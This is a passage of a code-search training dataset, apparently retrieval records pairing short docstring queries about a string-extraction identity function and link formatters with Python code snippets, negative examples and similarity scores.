visuals_2d_no_critical_caustic.tangential_critical_curves = None\r\n visuals_2d_no_critical_caustic.radial_critical_curves = None\r\n visuals_2d_no_critical_caustic.tangential_caustics = None\r\n visuals_2d_no_critical_caustic.radial_caustics = None\r\n\r\n plane_indexes = self.plane_indexes_from(plane_index=plane_index)\r\n\r\n if use_source_vmax:\r\n self.mat_plot_2d.cmap.kwargs[\"vmax\"] = np.max(self.fit.model_images_of_planes_list[-1])\r\n\r\n for plane_index in plane_indexes:\r\n\r\n if subtracted_image:\r\n\r\n self.mat_plot_2d.plot_array(\r\n array=self.fit.subtracted_images_of_planes_list[plane_index],\r\n visuals_2d=visuals_2d_no_critical_caustic,\r\n auto_labels=aplt.AutoLabels(\r\n title=f\"Subtracted Image of Plane {plane_index}\",\r\n filename=f\"subtracted_image_of_plane_{plane_index}\",\r\n ),\r\n )\r\n\r\n if model_image:\r\n\r\n if self.tracer.planes[plane_index].has(cls=aa.Pixelization):\r\n\r\n # Overwrite plane_index=0 so that model image uses critical curves -- improve via config cutomization\r\n\r\n visuals_2d_model_image = self.inversion_plotter_of_plane(plane_index=0).get_visuals_2d_for_data()\r\n\r\n else:\r\n\r\n visuals_2d_model_image = visuals_2d\r\n\r\n self.mat_plot_2d.plot_array(\r\n array=self.fit.model_images_of_planes_list[plane_index],\r\n visuals_2d=visuals_2d_model_image,\r\n auto_labels=aplt.AutoLabels(\r\n title=f\"Model Image of Plane {plane_index}\",\r\n filename=f\"model_image_of_plane_{plane_index}\",\r\n ),\r\n )\r\n\r\n if plane_image:\r\n\r\n if not self.tracer.planes[plane_index].has(cls=aa.Pixelization):\r\n\r\n self.tracer_plotter.figures_2d_of_planes(\r\n plane_image=True,\r\n plane_index=plane_index,\r\n zoom_to_brightest=zoom_to_brightest\r\n )\r\n\r\n elif self.tracer.planes[plane_index].has(cls=aa.Pixelization):\r\n\r\n inversion_plotter = self.inversion_plotter_of_plane(\r\n plane_index=plane_index\r\n )\r\n\r\n inversion_plotter.figures_2d_of_pixelization(\r\n pixelization_index=0,\r\n reconstruction=True,\r\n zoom_to_brightest=zoom_to_brightest,\r\n interpolate_to_uniform=interpolate_to_uniform\r\n )\r\n\r\n if use_source_vmax:\r\n self.mat_plot_2d.cmap.kwargs.pop(\"vmax\")", "def edit(self, p):\n self.poses[self.selected_point].model = p\n self.calibration_changed()", "def svm_add_2d_hyperplane(model, ax, plotted_points):\n X_MIN = np.min(plotted_points[:, 0])\n X_MAX = np.max(plotted_points[:, 0])\n Y_MIN = np.min(plotted_points[:, 1])\n Y_MAX = np.max(plotted_points[:, 1])\n # plot the line, the points, and the nearest vectors to the plane\n xx, yy = np.mgrid[X_MIN:X_MAX:200j, Y_MIN:Y_MAX:200j]\n Z = model.decision_function(np.c_[xx.ravel(), yy.ravel()])\n Z = Z.reshape(xx.shape)\n plot.contourf(xx, yy, Z, levels=np.linspace(\n Z.min(), 0, 7), cmap=plot.cm.PuBu)\n a = plot.contour(xx, yy, Z, levels=[0], linewidths=2, colors='darkred')\n plot.contourf(xx, yy, Z, levels=[0, Z.max()], colors='palevioletred')\n return a.collections[0]", "def set_active_perspective(self, name):\n self.perspective_cbox.SetStringSelection(name)\n self.enable_import()", "def is_point_on_plane(point, plane, tol=0.0):\n d = distance_point_plane(point, plane)\n return d <= tol", "def line_plane(l, p):\n d = dot((p.o - l.o), p.n) / dot(l.d, p.n)\n return l(d)", "def find_plane_eq(p1, p2, p3):\n\n p1 = np.asarray(p1)\n p2 = np.asarray(p2)\n p3 = np.asarray(p3)\n\n # These two vectors are in the plane\n v1 = p3 - p1\n v2 = p2 - p1\n\n # the cross product is a vector normal to the plane\n cp = np.cross(v1, v2)\n a, b, c = cp\n\n # This evaluates a * x3 + b * y3 + c * z3 which equals d\n d = np.dot(cp, p3)\n\n plane_eq = np.array([a, b, c, d])\n\n return plane_eq", "def LinePlaneIntersection(line, plane):\n plane = rhutil.coerceplane(plane, True)\n line_points = rhutil.coerce3dpointlist(line, True)\n line = Rhino.Geometry.Line(line_points[0], line_points[1])\n rc, t = Rhino.Geometry.Intersect.Intersection.LinePlane(line, plane) \n if not rc: return scriptcontext.errorhandler()\n return line.PointAt(t)", "def extract_plane_index_of_profile(self, profile_name):\r\n for plane_index, plane in enumerate(self.planes):\r\n for galaxy in plane.galaxies:\r\n if profile_name in galaxy.__dict__:\r\n return plane_index", "def get_plane_drawables(self):\n return self.plane.get_drawables()", "def setPointMode(self, mode):\n for point in self.points:\n point.mode = mode", "def plane_equation(p1, p2, p3):\n a1 = p2[0] - p1[0]\n b1 = p2[1] - p1[1]\n c1 = p2[2] - p1[2]\n a2 = p3[0] - p1[0]\n b2 = p3[1] - p1[1]\n c2 = p3[2] - p1[2]\n a = b1 * c2 - b2 * c1\n b = a2 * c1 - a1 * c2\n c = a1 * b2 - b1 * a2\n # Points are collinear\n if (abs(a) < 1e-6) and (abs(b) < 1e-6) and (abs(c) < 1e-6):\n return None\n # All clear\n d = (- a * p1[0] - b * p1[1] - c * p1[2])\n return a, b, c, d" ]
[ "0.63480055", "0.62466025", "0.6210041", "0.6181447", "0.60752785", "0.59501004", "0.5885949", "0.5844385", "0.5806675", "0.57641417", "0.5717144", "0.5657449", "0.5650415", "0.5615462", "0.5605463", "0.55464685", "0.55369604", "0.5516311", "0.5514092", "0.5510669", "0.55100155", "0.54709643", "0.54680014", "0.5427352", "0.54006386", "0.53856057", "0.53004605", "0.52668273", "0.52662754", "0.52640927", "0.526292", "0.52293146", "0.51846796", "0.5170561", "0.5167306", "0.50746065", "0.5074228", "0.5073328", "0.5064726", "0.5062183", "0.50609356", "0.50515", "0.49915475", "0.4983672", "0.4974672", "0.4962033", "0.4956949", "0.4956472", "0.49249968", "0.49089128", "0.48954904", "0.4873187", "0.4848546", "0.48300007", "0.48166892", "0.48024854", "0.4781594", "0.47592798", "0.47518408", "0.47489858", "0.47457308", "0.4742431", "0.47273412", "0.47220972", "0.47100902", "0.47099572", "0.46993428", "0.46972233", "0.46960855", "0.46931955", "0.4683895", "0.46563375", "0.46513733", "0.46467516", "0.46449706", "0.4641277", "0.4625659", "0.46240544", "0.46228787", "0.46194848", "0.46194193", "0.46173668", "0.4616275", "0.46157056", "0.4611305", "0.4607152", "0.46022305", "0.45979962", "0.45763144", "0.4567697", "0.45661473", "0.4545085", "0.45436013", "0.45406672", "0.45380822", "0.453247", "0.45319444", "0.45250157", "0.45213696", "0.45174584" ]
0.5889004
6
Identity function for string extraction.
def _(x): return x
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def intern(string): # real signature unknown; restored from __doc__\n return \"\"", "def identity_tokenizer(text):\n return text", "def identity( arg ):\n return arg", "def identification(self):\n return remove_whitespace(self.str_without_type())", "def test_identity(self):\n\n s = r\"|wthis|Xis|gis|Ma|C|complex|*string\"\n\n self.assertEqual(irc.parse_irc_to_ansi(irc.parse_ansi_to_irc(s)), s)", "def getIdentity():\n return Sentience.__IDENTITY.lower()", "def identity(value):\n return value", "def check_identity(input_string: str) -> str:\n n = input_string[2]\n if n == '6':\n return 'a foreigner with nationality'\n elif n == '7':\n return 'a national without household registration'\n elif n == '8':\n return 'from Hong Kong or Macau'\n elif n == '9':\n return 'from China'\n elif n == '0' \\\n or n == '1' \\\n or n == '2' \\\n or n == '3' \\\n or n == '4' \\\n or n == '5':\n return 'a normal national'\n else:\n # Should not happen\n return None", "def make_ident(text, sep='_'):\n return _RE_NO_IDENT_CHARS.sub(sep, text)", "def _str2id(text):\n return sha1(text).hexdigest()", "def tokenize(*args, **kwargs):\n if kwargs.pop('pure', False):\n return base.tokenize(*args)\n else:\n return str(uuid.uuid4())", "def identity():\n # We generate a name, an address, add them together and return that\n name = full_name()\n place_of_residence = address()\n new_identity = name + \", \" + place_of_residence\n return new_identity", "def _extract_identifier(self, publication):\n return self._parse_identifier(publication.metadata.identifier)", "def get_identifier(self):", "def get_string2(self):\n pass", "def string_id(self):\n id = self.id()\n if not isinstance(id, basestring):\n id = None\n return id", "def do(s):\r\n return get_AA_subs(generate_mutString(s))", "def fetch_current_user_id(s):", "def identity(x):\n return x", "def identity(x):\n return x", "def identity(x):\n return x", "def _identifier(self):\n identifier = self._get_next_symbol()\n\n while True:\n symbol = self._get_next_symbol()\n if symbol != None and symbol.isalnum():\n identifier += symbol\n else:\n if symbol != None:\n self._back()\n break\n\n return self._create_identifier_token(identifier)", "def autoid(self) -> str:", "def autoid(self) -> str:", "def identity(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"identity\")", "def identity(*args):\n return args if len(args) > 1 else args[0]", "def test_transform(self):\n t = Identity()\n assert t.transform(\"yo\") == \"yo\"", "def identifier():\n return (atomic() | hierarchical_identifier()).expect('identifier')", "def ident(self):\r\n text = self.component.get(\"id\", \"\")\r\n # strip surrounding curly braces from id\r\n return re.sub(\"[{}]\", \"\", text)", "def identifier(self):\n _id = ''\n while self.current_char is not None and self.current_char.isalpha():\n # inner loop to get alphanumeric characters\n while self.current_char is not None and\\\n self.current_char.isalnum():\n _id += self.current_char\n self.advance()\n return Token(self.tokentype['ID'], _id)", "def extract(self, id_str):\n if id_str == \"\" or id_str == None:\n raise InvalidIdentityString(\"Invalid user identity string\")\n\n id_mpz = str_to_mpz(id_str)\n a = hash_mpz(id_mpz, self.f)\n a_tmp = 0\n\n while gmpy2.jacobi(a_tmp, self.n) != 1:\n a_tmp = hash_mpz(a_tmp, self.f)\n a = a_tmp\n\n logging.debug(f\"Jacobi (a/n) = {gmpy2.jacobi(a, self.n)}\")\n logging.debug(f\"Jacobi (-a/n) = {gmpy2.jacobi(-a, self.n)}\")\n \n r = pow(a, (self.n + 5 - (self.p+self.q)) // 8, self.n)\n r2 = (r*r) % self.n\n\n logging.debug(f\"a = {a % self.n}\")\n logging.debug(f\"-a = {-a %self.n}\")\n logging.debug(f\"r = {r}\")\n logging.debug(f\"r**2 = {r2}\")\n\n if r2 != (a % self.n) and r2 != (-a % self.n):\n raise ExtractFailure(\n \"Error deriving r: r^2 != a (mod n) and r^2 != -a (mod n)!\")\n return (r, a)", "def test_replace_identity(self):\n pass", "def identifier(self):", "def get_unc_i(self):\n return self.unci", "def get_processed_string(self, input_string):\n if input_string[:6] == '[sic]\"':\n return input_string[6: -1]\n else:\n return input_string.format(**self)", "def t_STR_LITER(t):\n return t", "def format_mapping_identifier(string):\n\n if not isinstance(string, str):\n helper_logger.log_warning(\n \"Error: mapping identifier is not a string {}\".format(string))\n return\n\n\n # create a working copy (and make it lowercase, while we're at it)\n s = string.lower()\n\n # remove leading and trailing whitespace\n s = s.strip()\n\n # Replace whitespace with underscores\n # Make spaces into underscores\n s = re.sub(r'\\s+', '_', s)\n\n return s", "def insertable(m) -> str:\n return m[0]", "def _id(self):\n result = ''\n while self.current_char is not None and self.current_char.isalnum() or self.current_char == '_':\n result += self.current_char\n self.advance()\n\n return Token(ID, result)", "def test_glass_str__returns_uid():\n glass = moet.create_glass(\"A\")\n assert str(glass) == glass.uid", "def _magic_s(self, s):\n if idapy._d is None:\n print \"Please select a dump first. Example:\"\n print \"sel t2i\"\n return\n idapy._d.strings(s)", "def _sanitize_string(self, string):\n # get the type of a unicode string\n unicode_type = type(Pyasciigraph._u('t'))\n input_type = type(string)\n if input_type is str:\n if sys.version < '3':\n info = unicode(string)\n else:\n info = string\n elif input_type is unicode_type:\n info = string\n elif input_type is int or input_type is float:\n if sys.version < '3':\n info = unicode(string)\n else:\n info = str(string)\n else:\n info = str(string)\n return info", "def process(self, s: str) -> str:\n raise NotImplementedError(\"must be implemented by subclasses\")", "def main():\n\tprint 'Introduce string: '\n\ts = raw_input()\n\treturn if_unique_chars_one(s)", "def extract(string, start_marker, end_marker):\n start_loc = string.find(start_marker)\n end_loc = string.find(end_marker)\n if start_loc == -1 or end_loc == -1:\n return \"\"\n return string[start_loc+len(start_marker):end_loc]", "def get_identifier_string(self):\n return self.identifier", "def name2Id(self, classExpression):\n out = classExpression\n name_id = self.gen_name_id()\n for k, v in name_id.items():\n out = re.sub(\"\\'\"+k+\"\\'\", v, out) # Suspect this not Pythonic. Could probably be done with a fancy map lambda combo. \n return out", "def stringfilter(func):\n @wraps(func)\n def _dec(*args, **kwargs):\n if args:\n args = list(args)\n args[0] = str(args[0])\n return func(*args, **kwargs)\n\n return _dec", "def get_firmware_id_string(self):\n unpacked_string = False\n # Find the address of the string in memory\n id_string_addr = self._get_slt_entry(3)\n if id_string_addr is None:\n # maybe it's not packed in this slt\n id_string_addr = self._get_slt_entry(2)\n if id_string_addr is None:\n # Can't find it in the slt return None\n return None\n unpacked_string = True\n # parse the null terminated string\n last = build_string = \"\"\n # There is no reason for the build string to contain\n # any non ASCII character but do it like this to avoid\n # breaking support for Python 2.7\n try:\n char = unichr\n except NameError:\n char = chr\n while last != \"\\0\":\n word = self.get_data(id_string_addr)\n if unpacked_string:\n if Arch.addr_per_word == 4:\n # Two char per word\n build_string += char(word & 0x00FFFF)\n if build_string[-1] == \"\\0\":\n break\n last = char((word & 0xFFFF0000) >> 16)\n build_string += last\n else:\n # Only one char per word\n last = char(word)\n build_string += last\n else:\n # Four chars per word\n if Arch.addr_per_word == 4:\n string = cu.get_string_from_word(Arch.addr_per_word, word)\n stop_decoding = False\n for char in string:\n if char != '\\0':\n build_string += char\n else:\n stop_decoding = True\n break\n last = string[3:]\n\n if stop_decoding:\n break\n else:\n # Two chars per word\n build_string += char((word & 0xFF00) >> 8)\n if build_string[-1] == \"\\0\":\n break\n last = char(word & 0x00FF)\n build_string += last\n # Move to the next word in the string\n id_string_addr += Arch.addr_per_word\n\n # remove the \\0 we don't want the terminator\n if build_string[-1] == \"\\0\":\n build_string = build_string[:-1]\n\n return build_string.strip()", "def identification(self):\n return remove_whitespace(str(self))", "def makeIdentity(self) -> None:\n ...", "def _sanitize_to_identifer(name):\n n = name.strip()\n n = re.sub('/', ' ', n)\n n = re.sub('-', ' ', n)\n n = re.sub(' +', '_', n)\n n = re.sub('[\\W]+', '', n)\n return n", "def inner_map_function(s):\n\n return f(inner_strip(s))", "def __getitem__(self, *args):\n return _libsbml.string___getitem__(self, *args)", "def value(self, p_str, p_str_1=None): # real signature unknown; restored from __doc__ with multiple overloads\n return \"\"", "def process_string(string: str) -> str:\n\n return string if string else Presenter.DEFAULT", "def _findIdentifierValue (self, identifier : String) -> String:\n\n Logging.trace(\">>: %s\", identifier)\n cls = self.__class__\n\n if identifier not in self._keyToValueMap:\n # leave identifier as is (it might be some value name like\n # wahr or false\n Logging.traceError(\"no expansion found\")\n result = identifier\n else:\n result = self._keyToValueMap[identifier]\n\n if not isString(result):\n result = repr(result)\n else:\n result = (cls._doubleQuoteCharacter + result\n + cls._doubleQuoteCharacter)\n\n Logging.trace(\"<<: expanded %s into %r\", identifier, result)\n return result", "def as_identifier(self, string):\n t = string.lower()\n\n if t in self.keywords:\n return idaapi.COLSTR(string, idaapi.SCOLOR_ASMDIR)\n\n elif t in self.statements:\n return idaapi.COLSTR(string, idaapi.SCOLOR_LOCNAME)\n\n elif t in self.types:\n return idaapi.COLSTR(string, idaapi.SCOLOR_IMPNAME)\n\n else:\n return string", "def to_identifier(val: Any):\n val = str(val).strip()\n # Replaces spaces, dashes, and slashes to underscores\n val = re.sub(r\"[\\s\\-/\\\\]\", \"_\", val)\n # Remove remaining invalid characters\n val = re.sub(r\"[^0-9a-zA-Z_]\", \"\", val)\n # Identifier can't start with digits\n val = re.sub(r\"^[^a-zA-Z_]+\", \"\", val)\n\n if not val or iskeyword(val):\n raise ValueError(f\"Unable to convert to identifier: {val}\")\n\n return val", "def prepare_input(self, extracted_str):\n\n # Remove withspace\n if self.options['remove_whitespace']:\n optimized_str = re.sub(' +', '', extracted_str)\n else:\n optimized_str = extracted_str\n \n # Remove accents\n if self.options['remove_accents']:\n optimized_str = unidecode(optimized_str)\n\n # specific replace\n for replace in self.options['replace']:\n assert len(replace) == 2, 'A replace should be a list of 2 items'\n optimized_str = optimized_str.replace(replace[0], replace[1])\n\n return optimized_str", "def _ident(name: Optional[Union[quoted_name, str]]) -> Optional[str]:\n if name is None:\n return name\n elif isinstance(name, quoted_name):\n return str(name)\n elif isinstance(name, str):\n return name", "def func(str):\n\treturn str.split()", "def reference_to_id(value):\n m = re.search(r\"<@(U[A-Z0-9]+)>\", value)\n return m.group(1) if m else None", "def id_(x: Any) -> Any:\n return x", "def to_input(x):\n return '_'.join([x.split('_')[0], 'Input'])", "def test_process_string():\n decode = StringProcessor()\n assert decode.process_string(\"ab\") == \"\"\n decode.output = \"\"\n\n assert decode.process_string(\"ab*\") == \"b\"\n decode.output = \"\"\n\n assert decode.process_string(\"ab^\") == \"ba\"\n decode.output = \"\"\n\n assert decode.process_string(\"^\") == \"\"", "def parse_id(string):\n return string.split('/')[-1]", "def _id(self):\n result = ''\n while self.current_char is not None and self.current_char.isalnum():\n result += self.current_char\n self.advance()\n\n if self.current_char == '(' and self.is_declaration is False:\n self.advance()\n token = self.RESERVED_KEYWORDS.get(\n result.upper(), Token(CALL, result))\n else:\n token = self.RESERVED_KEYWORDS.get(\n result.upper(), Token(ID, result))\n self.is_declaration = False\n if token.type in (PROCEDURE, FUNCTION):\n self.is_declaration = True\n return token", "def _transform_identifier(self, identifier, scheme):\n urlize = self.context.get(\"urlize_identifiers\", True)\n prefix_scheme = self.context.get(\"prefix_identifier_schemes\", True)\n result = None\n\n if urlize:\n result = idutils.to_url(identifier, scheme, url_scheme=\"https\")\n\n if not result and prefix_scheme and not identifier.startswith(scheme):\n result = f\"{scheme}:{identifier}\"\n\n return result or identifier", "def identify(func):\n def identified(arg):\n func(arg)\n return arg\n return identified", "def unique_id() -> str:", "def PrepareIdentifier (s, in_use, aux_keywords=frozenset(), private=False, protected=False):\n s = DeconflictKeyword(MakeIdentifier(s).strip('_'), aux_keywords)\n if private:\n s = '__' + s\n elif protected:\n s = '_' + s\n return MakeUnique(s, in_use)", "def test_graphid_str():\n id1 = _ir.GraphId(\"g1\")\n assert id1.str() == \"g1\"\n id2 = _ir.GraphId(\"foobar\")\n assert id2.str() == \"foobar\"", "def str2nopunc(x):\n if isinstance(x,str):\n y = re.sub(r'[^\\w\\s]','',x.lower().strip()).replace('_','')\n else:\n y = x\n return y", "def get_str(self, idx):\n if idx not in self.id2Str:\n return None\n else:\n return self.id2Str[idx]", "def eidr_identifier(title):\n pass", "def unpack_id(self, bytes_string, offset=0):\r\n return self._packer.unpack_from(bytes_string, offset)", "def strip_action_str(string: str) -> str:", "def parse(s):\n return s", "def _tokenize4map(param):\n return _tokenize(*param)", "def _decompose(cls,\n s = '',\n element = False):\n\n s = s.strip()\n\n x = cls._html.findall(s)\n if len(x) > 0:\n s = ''.join(x[0][::-1])\n\n s = cls._translate.get(s.lower(), s)\n\n name = s.strip()\n n = len(name)\n el = ''\n a = ''\n e = ''\n\n # get numbers\n n = re.findall(\"\\d+\", name)\n\n # get strings\n cx = re.findall(\"\\D+\", name)\n\n c = []\n for x in cx:\n xx = x.split('-')\n cy = [y for y in xx if y != '']\n c += cy\n if len(c) == 2:\n if c[0] in ('m', 'g'):\n c = c[::-1]\n if c[0][0] == '*':\n c = c[::-1]\n if len(n) > 0: a = n[0]\n if len(n) > 1: e = n[1]\n if len(n) > 2: raise ValueError(\"Can't understand isotope '{}'.\".format(s))\n if len(c) > 0: el = c[0]\n if len(el) > 0:\n if el[-1] in cls.EXCITE and len(c) == 1 and len(n) == 2:\n c.append(el[-1])\n el = el[:-1]\n if len(c) == 2 and c == ['(', ')']:\n if len(n) == 1:\n a = n[0]\n el = 'Z='\n e = ''\n c = []\n n = []\n else:\n return (s,) + ('',)*3\n if len(c) == 2:\n if c[1] in ('g', 'G'):\n e = '0'\n if len(n) > 1:\n return (s,) + ('',)*3\n elif c[1] in ('m', 'M') and len(n) == 1:\n e = '1'\n elif c[1][0] == '*' and len(n) == 1:\n e = str(len(c[1]))\n assert c[1].count('*') == len(c[1])\n if e == '1':\n e = str(cls.EANY)\n if not c[1] in ('m', 'g', 'M', 'G') and not c[1][0] == '*':\n return (s,) + ('',)*3\n\n if len(c) == 1 and c[0][-1] == '*':\n e = 0\n while c[0][-1] == '*':\n c[0] = c[0][:-1]\n e += 1\n assert e == 1\n e = str(e)\n el = c[0]\n\n if len(c) == 1 and c[0][0] == '*':\n e = 0\n while c[0][0] == '*':\n c[0] = c[0][1:]\n e += 1\n assert e == 1\n e = str(e)\n el = c[0]\n\n if s == 'a' and a == '':\n el = 'He'\n a = '4'\n # this is a possible conflict with potassium\n elif (element) and s == 'p':\n el = 'P'\n elif s == 'p':\n el = 'H'\n a = '1'\n elif el in ('p', 'pn') and a == '1':\n el = 'H'\n elif s == 'pn':\n el = 'H'\n a = ''\n elif el in ('d', 'D'):\n el = 'H'\n if not a in ('', '2'):\n raise AttributeError('\"d\" already implies mass; if supplied needs to be \"2\".')\n a = '2'\n elif el in ('t','T'):\n el = 'H'\n if not a in ('', '3'):\n raise AttributeError('\"t\" already implies mass; if supplied needs to be \"3\"')\n a = '3'\n elif (element) and s == 'n':\n el = 'N'\n elif s == 'n':\n el = 'nt'\n a = '1'\n elif el in ('n', 'nt') and a == '1':\n el = 'nt'\n elif s in ('g', 'G'):\n el = ''\n a = ''\n e = '1'\n elif (s.lower() in ('e-', 'b-', 'bd', 'pc')):\n s = el = 'e-'\n elif ((s.lower() in ('e+', 'b+', 'ec'))\n or ((not element) and (s.lower() == 'pd'))):\n s = el = 'e+'\n elif ((not element) and (s.lower() == 'ps')):\n s = 'h1'\n a = '1'\n el = 'h'\n elif ((not element) and (s.lower() == 'ns')):\n s = 'nt1'\n a = '1'\n el = 'nt'\n el = el.strip()\n# if len(el) == 2 and el(2)\n a = a.strip()\n e = e.strip()\n return s, el, a, e", "def make_python_identifier(string):\n # Todo: check for variable uniqueness\n # perhaps maintain a list of current variables and their translations??\n # Todo: check that the output is actually a valid python identifier\n\n string = string.lower()\n\n # remove leading and trailing whitespace\n string = string.strip()\n\n # Make spaces into underscores\n string = string.replace(' ', '_')\n\n # Make commas and brackets into underscores (mostly for subscript column names)\n string = string.replace(',', '__').replace('[','__')\n\n # Remove invalid characters\n string = re.sub('[^0-9a-zA-Z_]', '', string)\n\n # Remove leading characters until we find a letter or underscore\n string = re.sub('^[^a-zA-Z_]+', '', string)\n\n # Check that the string is not a python identifier\n if string in keyword.kwlist:\n string += '_element'\n\n return string", "def getIdentifier(self, length):\n return self._getStr(length)", "def string_ids(f):\n\n\t@functools.wraps(f)\n\tdef wrapper(self, *args):\n\t\treturn f(self, *[str(arg) for arg in args])\n\n\treturn wrapper", "def t_STRING(t):\n return t", "def string_from_invokedymanic(ins, cf):\n info = InvokeDynamicInfo.create(ins, cf)\n if not isinstance(info, StringConcatInvokeDynamicInfo):\n return\n \n return info.recipe", "def encode_fn(s_in):\r\n s_out = s_in.split()\r\n return s_out", "def extract_name():\n def _extract_name(quoted_name):\n return e.String(quoted_name.subexpression.name)\n yield (\"(λ &[name] . str)\", _extract_name)", "def process_id_from(self):\r\n return self._tokens[1]", "def us(self, string=''):\n return string.replace(' ', '_')", "def decode(self, s):", "def decode(self, s):", "def _extract_id(self, dirty_id):\n if dirty_id[:1] == \"/\":\n return dirty_id.split(\"/\")[-1]\n else:\n return dirty_id", "def id(self, tokens):\n if len(tokens) != 1:\n raise Exception(\"Unexpected argument counts\")\n return tokens[0].value", "def get_string(self, **kwargs):\n ...", "def _getvalue_expr_Str(self, expr: ast.Str) -> Any:\n return expr.s", "def transform(self, *args):\n return _libsbml.IdentifierTransformer_transform(self, *args)", "def dense_name(string: str) -> str:\n return \"\".join(string.split(\"_\"))", "def _(string):\n\t\treturn string", "def process_id_to(self):\r\n return self._tokens[3]", "def string_to_index(s):\n s = Unquote(s)\n if s == \".\":\n return ()\n return tuple(s.split(\"/\"))" ]
[ "0.6034306", "0.5799975", "0.5765744", "0.57460624", "0.5699749", "0.5639867", "0.5598918", "0.5493786", "0.5481133", "0.54755294", "0.54505527", "0.5449481", "0.5441116", "0.5371032", "0.5352636", "0.5330441", "0.5291735", "0.5242051", "0.52288747", "0.52288747", "0.52288747", "0.5217174", "0.5172035", "0.5172035", "0.5169953", "0.5163742", "0.5134386", "0.51233023", "0.51216316", "0.51214445", "0.51105213", "0.5081293", "0.5067943", "0.50608945", "0.5059076", "0.5054062", "0.5040261", "0.50320506", "0.5028208", "0.5023658", "0.50209665", "0.5004532", "0.5003816", "0.4993281", "0.49892876", "0.49756178", "0.4962436", "0.495584", "0.49474713", "0.49472144", "0.49375692", "0.49288175", "0.49265495", "0.49137837", "0.49093226", "0.49045956", "0.48956546", "0.48901075", "0.48873535", "0.4881078", "0.48776466", "0.48775756", "0.48632097", "0.4861621", "0.48613435", "0.48586354", "0.48560598", "0.4853348", "0.4852577", "0.48514494", "0.48504713", "0.48493055", "0.4848312", "0.4830739", "0.48275986", "0.4825529", "0.48197076", "0.48177534", "0.48172933", "0.48091263", "0.480745", "0.48066044", "0.4799723", "0.479876", "0.47974417", "0.4790127", "0.4778079", "0.4765839", "0.47647402", "0.47634274", "0.47586876", "0.47586876", "0.47577292", "0.4756921", "0.47470915", "0.47450992", "0.47401515", "0.47368607", "0.4734394", "0.47300136", "0.47279772" ]
0.0
-1
Generate a object formatter for links..
def link(text, link_func): def object_formatter(v, c, m, p): """Format object view link.""" return Markup('<a href="{0}">{1}</a>'.format( link_func(m), text)) return object_formatter
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def object_formatter(v, c, m, p):\n return Markup('<a href=\"{0}\">{1}</a>'.format(\n link_func(m), text))", "def __repr__(self):\n if self.rest:\n rest_repr = ', ' + repr(self.rest)\n else:\n rest_repr = ''\n return 'Link({0}{1})'.format(self.first, rest_repr)", "def linkify(obj, link_text=''):\n try:\n lst = []\n # if obj is not a list, convert it into a list\n if not getattr(obj, '__iter__', False):\n obj = [obj]\n for item in obj:\n if hasattr(item, 'child'):\n item = item.child\n if link_text == '':\n l_text = unicode(item)\n else:\n try:\n link_text = link_text.encode('ascii')\n l_text = getattr(item, link_text, link_text)\n except UnicodeEncodeError:\n l_text = link_text\n if not (isinstance(item, Content) and\n isinstance(l_text, SafeText)):\n l_text = filter.force_escape(l_text)\n format_args = (item.get_absolute_url(), l_text)\n lst.append(mark_safe('<a href=\\'%s\\'>%s</a>' % format_args))\n\n # nonlists obj's should be returned as nonlists\n return lst[0] if len(lst) == 1 else lst\n except:\n return ''", "def fmt(e):\n name = str(e.label.first() if hasattr(e, 'label') and e.label else e)\n if re.match(r'^[a-z]+://', name):\n return link.format(name=name, url=name)\n if hasattr(e, 'label') and e.label:\n name = e.label.first()\n url = name if re.match(r'^[a-z]+://', name) else '#' + name\n return link.format(name=name, url=url)\n elif re.match(r'^[a-z]+://', str(e)):\n return link.format(name=e, url=e)\n else:\n return str(e).replace('owl.', 'owl:')", "def __repr__(self):\n ## return str(self.first) + \" -> \" + repr(self.rest)\n if self.rest is Link.empty:\n rest_str = \"\"\n else:\n rest_str = \", \" + repr(self.rest)\n return \"Link({0}{1})\".format(self.first, rest_str)", "def __str__(self):\n\t\treturn '{0} ({1})'.format (self.name, self.link)", "def format(self, obj):\n pass", "def format(self, obj):\n pass", "def __repr__(self):\n if self.rest is Link.empty:\n rest = ''\n else:\n rest = ', ' + repr(self.rest)\n return 'Link({0}{1})'.format(self.first, rest)", "def format_link_segment(value):\n format_type = json_api_settings.FORMAT_RELATED_LINKS\n return format_value(value, format_type)", "def href(obj):\n if isinstance(obj, Filing):\n return reverse('filing', args=(obj.region, obj.name, obj.period_name))\n else:\n raise ValueError('cannot build a URL for {}.{} objects'.format(\n type(obj).__module__, type(obj).__name__))", "def __str__(self):\n return '<a href=\"%s\" class=\"%s\" %s>%s</a>' % (self.url, self.cssclass, self.options, self.text)", "def to_html(self) -> str:\n return f'''\n <a href=\"{self.link}\"> ({self.source_name}, {self.timestamp.strftime('%Y')}) </a>\n '''", "def linkified_description(self):\n links = []\n def linkify(matchobj, links=links):\n if '|' in matchobj.group(1):\n url = matchobj.group(1).split('|')\n link = format_html('<a href=\"{0}\" target=\"_blank\">{1}</a>', url[0], url[1])\n else:\n link = format_html('<a href=\"{0}\" target=\"_blank\">{1}</a>', self.url, matchobj.group(1))\n links.append(link)\n return '{%d}' % (len(links) - 1)\n\n fmt = re.sub(r'\\[\\[([^\\]]+)\\]\\]', linkify, self.description)\n return format_html(fmt, *links)", "def link(self, obj):\n return format_html(\n '<a href=\"{url}\">{url}</a>',\n url='https://sms.cam.ac.uk/collection/{}'.format(obj.id)\n )", "def linkify(field_name):\n def _linkify(obj):\n linked_obj = getattr(obj, field_name)\n if linked_obj is None:\n return '-'\n app_label = linked_obj._meta.app_label\n model_name = linked_obj._meta.model_name\n view_name = f'admin:{app_label}_{model_name}_change'\n link_url = reverse(view_name, args=[linked_obj.pk])\n return format_html('<a href=\"{}\">{}</a>', link_url, linked_obj)\n\n _linkify.short_description = field_name # Sets column name\n return _linkify", "def linkify(field_name):\n\n def _linkify(obj):\n linked_obj = getattr(obj, field_name)\n if linked_obj is None:\n return '-'\n app_label = linked_obj._meta.app_label\n model_name = linked_obj._meta.model_name\n view_name = f'admin:{app_label}_{model_name}_change'\n link_url = reverse(view_name, args=[linked_obj.pk])\n return format_html('<a href=\"{}\">{}</a>', link_url, linked_obj)\n\n _linkify.short_description = field_name # Sets column name\n return _linkify", "def _format_obj(cls, **kwargs):\n def doc_rebuilder(obj):\n if kwargs.pop('_VOID_',False):\n return ''\n try:\n doc = getattr(obj,'__doc__')\n assert doc\n except:\n return ''\n else:\n return doc.format(**kwargs) # str(doc).format(**kwargs)\n return doc_rebuilder", "def 